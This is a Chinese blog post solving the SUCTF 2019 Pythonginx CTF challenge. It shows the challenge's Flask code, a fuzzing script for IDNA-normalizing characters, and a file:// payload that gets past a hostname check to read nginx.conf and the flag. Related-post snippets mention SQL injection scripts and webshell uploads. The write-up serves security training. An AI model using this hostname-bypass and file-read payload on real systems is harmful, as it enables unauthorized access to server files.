一天一道ctf 第32天

[SUCTF2019]黑客攻防:IDNA编码挑战
最新推荐文章于 2024-06-13 23:21:24 发布
原创 最新推荐文章于 2024-06-13 23:21:24 发布 · 205 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

[SUCTF 2019]Pythonginx
题目源码;

 @app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
    url = request.args.get("url")
    host = parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return "我扌 your problem? 111"
    parts = list(urlsplit(url))
    host = parts[1]
    if host == 'suctf.cc':
        return "我扌 your problem? 222 " + host
    newhost = []
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    #去掉 url 中的空格
    finalUrl = urlunsplit(parts).split(' ')[0]
    host = parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return urllib.request.urlopen(finalUrl).read()
    else:
        return "我扌 your problem? 333"

这道题就是要使urlparse和urlsplit分离出来的主机名不是suctf.cc,然后经过h.encode('idna').decode('utf-8')(先idna加密,再utf-8解密),最后的主机名还原成suctf.cc

这是网上找来的脚本,用来找能利用的字符

# coding:utf-8 
for i in range(128,65537):    
    tmp=chr(i)    
    try:        
        res = tmp.encode('idna').decode('utf-8')        
        if("-") in res:            
            continue        
        print("U:{}    A:{}      ascii:{} ".format(tmp, res, i))    
    except:        
        pass

题目源代码中还提示说nignx,它的目录是/usr/local/nginx/conf/nginx.conf
所以我们需要最后URL变成file://suctf.cc/usr/local/nginx/conf/nginx.conf
通过脚本找到℆在idna加密,utf-8解密后会变成c/u,因此payload就是file://suctf.c℆sr/local/nginx/conf/nginx.conf
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
或者把c替换成ℂ,把f替换成ℱ都是可以的
在这里插入图片描述
提示我们flag在/user/fffffflag中,file://suctf.c℆sr/fffffflag直接读到flag

scrawman
关注
[SUCTF 2019]Pythonginx 1
m0_62879498的博客
05-12 1198
[SUCTF 2019]Pythonginx 1 打开环境,我们获得一串源码 @app.route('/getUrl', methods=['GET', 'POST']) def getUrl(): url = request.args.get("url") host = parse.urlparse(url).hostname #解析主机名 if host == 'suctf.cc': return "我 your problem? 111"
[SUCTF 2019]Pythonginx1
wangrong0966的博客
12-19 1176
uWSGI(发音为 "microservice")是一个应用程序容器,它可以用来运行任何语言编写的应用程序,包括但不限于Python、Ruby、PHP、Lua和Java。uWSGI以其轻量级、快速和模块化的特点而闻名,它提供了一个轻量级的替代方案,用于传统的重型应用服务器(如Apache HTTP Server或Nginx)。此外,代码中的注释和格式化已经添加,以提高代码的可读性。这个配置文件是Web应用部署中常见的Nginx配置,用于将Web请求转发到后端应用服务器,并处理静态文件的请求。
[SUCTF 2019]Pythonginx
qq_43801002的博客
05-07 502
#题目: @app.route('/getUrl', methods=['GET', 'POST']) def getUrl(): url = request.args.get("url") host = parse.urlparse(url).hostname if host == 'suctf.cc': return "我 your problem? ...
一天一道ctf 第47(二分法盲注)
scrawman的博客
07-29 436
[BSidesCF 2019]Kookie 看样子是要我们以admin登录,线索是cookie。只要抓包添加cookie:username=admin就行了(???) [WUSTCTF2020]颜值成绩查询
一天一道ctf 第56(ascii偏移盲注)
scrawman的博客
08-18 628
[GYCTF2020]Ezsqli 先用二分法写一个脚本查一下表名,二分法快是快,但就是容易出错,用sleep延缓一下请求速度会好一些。or被过滤了所以informaiton.schema用不了,换成sys.x$schema_flattened_keys。 import requests import time url = "http://7630a861-14ab-4171-bfd2-dff39c2434b9.node4.buuoj.cn:81/" flag = "" payload = "1^(a
一天一道CTF 第13(双写绕过SQL注入 dirsearch)
scrawman的博客
03-22 657
做两道因为明有个大工程 [极客大挑战 2019]Upload 背景选的不错 就是简单的一句话木马然后抓包改后缀名再webshell连接,做过太多遍了这里就不做了,直接下一道 [极客大挑战 2019]BabySQL 尝试admin' or '1'='1和password'发现password里的or被删掉了,这里应该是用最简单粗暴的删除字符串来过滤。多试几次就会发现还过滤了union和select,这种过滤双写绕过即可,payload基本都和上次一样。 http://74522396-5ad3-4
一天一道ctf之攻防世界-CGfsb
qq_42728977的博客
08-29 430
暑假笼统地学了Pwn,听的迷迷糊糊的,现在拾起来从头学。开始做题了,拿到程序扔进IDA。 int __cdecl main(int argc, const char **argv, const char **envp) { int buf; // [esp+1Eh] [ebp-7Eh] int v5; // [esp+22h] [ebp-7Ah] __int16 v6; // [esp...
大连海事大学第一届“启航杯”DLMU CTF部分题解
TMMXA的博客
12-13 2768
大连海事大学第一届“启航杯”CTF校园网络安全竞赛 签到题 0. dlmuctf2020 flag{welcome_to_dlmuctf2020} dlmuctf{welcome_to_dlmuctf2020} 1. 早安,贝丝人 TVJXRzI1TERPUlRIV1NCV09aU1Y2TlM3TTRZREFaQzdNUTNIU0lMNQ== ​ 很明显的Base64编码,解密后得到MRWG25LDORTHWSBWOZSV6NS7M4YDAZC7MQ3HSIL5,在进行Base32解码,拿到flag:dlm
【学习笔记16】buu [SUCTF 2019]Pythonginx
weixin_43553654的博客
05-16 753
打开一看发现给了一堆代码这样看不方便我们就去查看源码 @app.route('/getUrl', methods=['GET', 'POST']) def getUrl(): url = request.args.get("url") host = parse.urlparse(url).hostname if host == '...
web buuctf [SUCTF 2019]Pythonginx1
weixin_44214568的博客
04-08 5200
知识点:1.nignx 2.idna编码与utf-8编码的漏洞 1.开题 查看源码,整理代码: @app.route('/getUrl', methods=['GET', 'POST']) def getUrl(): url = request.args.get("url") host = parse.urlparse(url).hostname //经过urlparse解析所得hostname不能为suctf.cc if ...
BUUCTF:[SUCTF 2019]Pythonginx
qq_46230755的博客
12-18 570
题目提示了,是ngix,所以我们要知道nginx一些文件存放的地方 配置文件存放目录:/etc/nginx 主配置文件:/etc/nginx/conf/nginx.conf 管理脚本:/usr/lib64/systemd/system/nginx.service 模块:/usr/lisb64/nginx/modules 应用程序:/usr/sbin/nginx 程序默认存放位置:/usr/share/nginx/html 日志默认存放位置:/var/log/nginx 配置文件目录为:/usr/local
渗透测试练习题解析 6 (CTF web)
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
06-13 1406
先注册一个账号看看,注册 admin 会提示该用户名已存在,那我们就换一个用户名观察页面功能,存在一个修改密码,开始的思路是想看看能否通过该密码功能抓包然后修改用户名为 admin 从而修改 admin 用户的密码(任意密码修改),最后发现不行,因为数据包不存在修改用户名的地方然后就换了一个思路,二次注入,在注册页面先注册一个正常的不重复的用户,然后获取返回包信息,保存下来,再注册一个和 admin 同名的用户,把错误的返回包替换成前面获取的正确返回包从而达到修改 admin 密码的目的。
BUUCTF刷题十一道(06)
qq_45837896的博客
07-29 1955
BUUCTF刷题十一道
flask的一道题目,文件读取
小学生的博客
05-20 657
[SUCTF 2019]Pythonginx 题目提供了flask框架代码 def getUrl(): url = request.args.get("url") host = parse.urlparse(url).hostname if host == 'suctf.cc': return "我 your problem? 111" parts = list(urlsplit(url)) host = parts[1] if host =
ctf似乎是个加密“倒计时最后一天
最新发布
09-13
CTF竞赛中常见的加密方式有多种,以下为你介绍几种不同加密方式对“倒计时最后一天”进行加密的示例。 ### RSA加密 RSA是一种经典的非对称加密算法。参考示例中的Python代码,在实际应用时需先生成大素数 `p` 和 `q...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值